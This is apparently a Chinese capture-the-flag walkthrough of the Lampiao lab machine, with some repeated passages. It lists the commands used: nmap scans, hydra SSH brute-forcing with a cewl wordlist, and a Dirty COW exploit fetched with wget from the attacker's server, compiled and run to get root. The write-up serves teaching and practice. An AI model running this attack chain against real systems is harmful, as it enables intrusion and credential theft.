文章目录

  • 第1次 Lampiao靶机练习
    • kali扫描
      • netdiscover扫描
      • namp扫描
        • 第1次扫描
        • 第2次扫描
    • 御剑扫描
      • 打开扫描到的文件
      • 打开登录网站
        • sql注入
        • 链接跳转
          • node/1
          • node/3
          • node/2
    • kali操作
      • 利用cewl获取网站信息
      • hydra对用户密码进行爆破
      • ssh进行登录
      • 查看靶机信息:
      • 提权
        • 利用脏牛提权
        • 开启临时服务器
        • 对40847文件的操作
          • 查找40847.cpp文件
          • 拷贝40847.cpp文件
          • tiago用户下载40847.cpp文件
          • 对40847.cpp文件进行编译:
        • 找到flag.txt文件
        • 找到flag.txt文件

第1次 Lampiao靶机练习

kali扫描

netdiscover扫描

安装好靶机之后,有个账户密码登录,但我们并不知道账户和密码,所以我们用kali进行扫描其ip地址

用命令进行扫描

netdiscover

得到IP地址:

192.168.81.139

namp扫描

命令如下:

第1次扫描

发现了2个端口,22和80

nmap -T4 -A -v 192.168.81.139

连接密码:

ssh-hostkey:
|   1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|   2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|   256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_  256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)

第2次扫描

发现了3个端口,22、80和1898

nmap -p- -A -sV 192.168.81.139

御剑扫描

扫描1898端口出来了信息

http://192.168.81.139:1898

扫描的信息如下

http://192.168.81.139:1898/robots.txt
http://192.168.81.139:1898/includes/
http://192.168.81.139:1898/misc/
http://192.168.81.139:1898/index.php
http://192.168.81.139:1898/install.php

打开扫描到的文件

http://192.168.81.139:1898/robots.txt

可以看到下面文件中包含很多信息,并且含有路径信息,可以看到有一个更新日志文件

Disallow: /CHANGELOG.txt

打开这个文件

http://192.168.81.139:1898/CHANGELOG.txt

robots.txt文件内容

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.htmlUser-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

打开登录网站

直接加端口号就进入了这个网站

http://192.168.81.139:1898/

sql注入

未能成功

1'

链接跳转

发现两处可以跳转

node/1

跳转后的网址如下:

http://192.168.81.139:1898/?q=node/1

node/3
http://192.168.81.139:1898/?q=node/3

发现有一个音频文件和一句话:Node 2 is not working

打开音频文件

并未有任何有用的信息

http://192.168.81.139:1898/LuizGonzaga-LampiaoFalou.mp3
node/2

把node/3,改为node/2

得到一个音频文件和一个图片

http://192.168.81.139:1898/?q=node/2
audio.m4a
qrc.png

打开音频文件

http://192.168.81.139:1898/audio.m4a

打开图片

http://192.168.81.139:1898/qrc.png

发效了一个二维码

扫描之后,发现信息如下:

Try harder!muahuahua

kali操作

利用cewl获取网站信息

利用cewl获取网站关键信息从而生成一个密码字典:

cewl http://192.168.81.139:1898 -w lampiao.txt

hydra对用户密码进行爆破

利用hydra对用户tiago密码进行爆破:

hydra -l tiago -P lampiao.txt 192.168.81.139 ssh

得到账户密码:

login: tiago
password: Virgulino

ssh进行登录

利用ssh进行登录:

ssh tiago@192.168.81.139

根据提示输入

yes
Virgulino (这个就是密码)

查看靶机信息:

uname -a

提权

利用脏牛提权

用Kali 自带的漏洞搜索有无能进行脏牛提权的shell:

searchsploit dirty

开启临时服务器

  • 将40847.cpp文件复制到当前目录下
  • 并且利用 python2 -m SimpleHTTPServer 1234
  • 开启临时的建议服务器

注意事项

  • 因此使用Python2时要特别注明,
  • 如果没安装Python3则不用特殊注明,
  • Python3无法利用该方法开启简易服务器,
    • 另外,开启服务器后默认的访问目录

      • 为当前开启服务器的目录,
      • 即我在 ~/桌面 这个目录下,
      • 则在浏览器中访问的话则默认能看 ~/桌面 目录下的文件。

对40847文件的操作

查找40847.cpp文件
find / -name 40847.cpp
拷贝40847.cpp文件

把文件复制到要定义的服务目录下

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp  /home/xxb1/

使用下面命令时,要在

/home/xxb1/        目录下使用
python2 -m SimpleHTTPServer 1234

tiago用户下载40847.cpp文件

在刚才ssh登录的tiago用户的/tmp目录下下载40847.cpp文件:

wget http://192.168.81.131:1234/40847.cpp
#ip地址改为自己的kali的IP

对40847.cpp文件进行编译:
g++ -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil./40847   #这个是-o 后面的那个名字,可自定义

解释:

  • -O2 :表示编译器的优化选项,
  • -std=c++11:表示按照c++ 2011标准来编译,
  • -pthread :是指利用到多线程时需要用到的库(我也不知道为啥要加上这个参数,希望评论区有大神能指出)
  • -o name :中name表示生成的文件的名字

获取到了root的密码:

dirtyCowFun

再利用ssh登录:

ssh root@192.168.81.139

发现登陆后已经是root了

找到flag.txt文件

内容如下:

9740616875908d91ddcdaa8aea3af366

:表示编译器的优化选项,

  • -std=c++11:表示按照c++ 2011标准来编译,
  • -pthread :是指利用到多线程时需要用到的库(我也不知道为啥要加上这个参数,希望评论区有大神能指出)
  • -o name :中name表示生成的文件的名字

[外链图片转存中…(img-qiIdpB4i-1646028456448)]

获取到了root的密码:

dirtyCowFun

再利用ssh登录:

ssh root@192.168.81.139

发现登陆后已经是root了

[外链图片转存中…(img-txiHzLqu-1646028456449)]

找到flag.txt文件

内容如下:

9740616875908d91ddcdaa8aea3af366

[外链图片转存中…(img-GUX9hqmc-1646028456449)]

Lampiao 靶机练习相关推荐

  1. Lampiao靶机渗透测试

    文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...

  2. lampiao靶机实验实战演练

    一.明确目标 探测主机存活情况 靶机 ip : 192.168.119.155 Kali  ip :192.168.119.129 二.信息搜集 Nmap 进行常规端口开放扫描 开放了22 ssh 8 ...

  3. VulnHub系列之Lampiao渗透测试

    Lampiao 靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/ 信息收集 首先是ip信息 然后是服务器端口服务等信息 访问80端口 扫描80端口网站 ...

  4. 【vulnhub】Lampiao渗透实战(脏牛提权)

    总结 1.该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2.在没有思路的时候,try yourself !往往有不同的收获 3.再练练脏牛提权... Lampiao靶机百度 ...

  5. DAY29(DAY30拓展):Vulnhub--靶机实战

    DAY29:vulnhub 靶机实战 1.vulnhub(DC-1 靶机) 打开靶机 扫描存活主机确定 DC-1 的ip地址,使用 nmap nmap -sS 网段 nmap -sP 192.168. ...

  6. 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...

  7. 3.100个渗透测试实战#3(Lampiao)

    目录 一.实验环境 二.实验流程 三.实验步骤 (一)信息收集--主机发现 1.查看kali的网卡和IP信息:(网卡名:eht0:IP:192.168.97.129) 2.查看靶机页面: 3.探测特定 ...

  8. [VulnHub靶机]Lampiao_脏牛提权

    文章目录 环境介绍 实验步骤 1. 扫描端口 2. 信息收集 3. ssh爆破 4. drupal 7 漏洞getshell 5. 脏牛提权 环境介绍 攻击机:kali(192.168.56.104) ...

  9. Vulnhub靶场篇:Lampiao 夜车星繁的博客

    因为本透明水平看来还没达到手撕vulnhub的级别,所以这些靶场都是参考的前辈们的文章一步步来的,由于作者水平有限所以写的博客会"雷厉风行"走的是一步到位相对更简单的渗透路线,尽量 ...

最新文章

  1. android h5 多图上传源码,JS移动端/H5同时选择多张图片上传并使用canvas压缩图片...
  2. 求合体电脑版_SCP CB 电脑移植版测评
  3. 在 Mac OSX 版的 LispBox 环境上安装配置 SBCL 详细过程
  4. mysql 导出函数_mysql导出存储过程或函数
  5. 【XAudio2】3.关键概念
  6. 通过Blazor使用C#开发SPA单页面应用程序(4) - Ant Design
  7. Navicat中无法自定义标量值函数的问题
  8. docker可以把应用及其相关的_声学中的相干性及其相关应用!
  9. Ren获得Zcash技术咨询委员会资助,将在币安智能链上启动RenZEC流动性引导计划
  10. [USACO07FEB]银牛派对Silver Cow Party
  11. 蓝桥杯 ALGO-89 算法训练 字符删除
  12. “文艺复兴” ConvNet卷土重来,压过Transformer!FAIR重新设计纯卷积新架构
  13. [学习日记] 文件读写 FileStream
  14. 各版本delphi下载
  15. java生成pdf表格_java生成pdf文件 --- Table
  16. ROS | 机器人操作系统简介
  17. hysys动态模拟教程_(转载)HYSYS-过程模拟软件-稳态模拟-第一部分(一)
  18. Cocos2d-x制作《单机斗地主》源码解剖5:玩家的出牌
  19. 软件的静态测试和动态测试【软件测试分类】
  20. Unity3D教程(一)安装以及使用Unity3D

热门文章

  1. Improved Disease Classification in Chest X-Rays with Transferred Features from Report Generation论文解读
  2. OLED显示图片的技能,你Get了吗?
  3. 求和!李姐万岁!用ChatGPT写GitBook布局锤子便签配色的WordPress主题
  4. 基于python实现FPS(最远距离采样)
  5. zookeeper单机服务器启动流程
  6. 这可能是简易的机器学习入门(小白必读)
  7. 电商扣减库存_严选库存中心性能优化
  8. 流式双染凋亡率的计算_Annexin V-FITC/PI双染细胞凋亡检测方法
  9. uni-app学习日记5
  10. 产能、产量、销量、销售额、价格及市场份额-全球与中国市场公用空气净化消毒器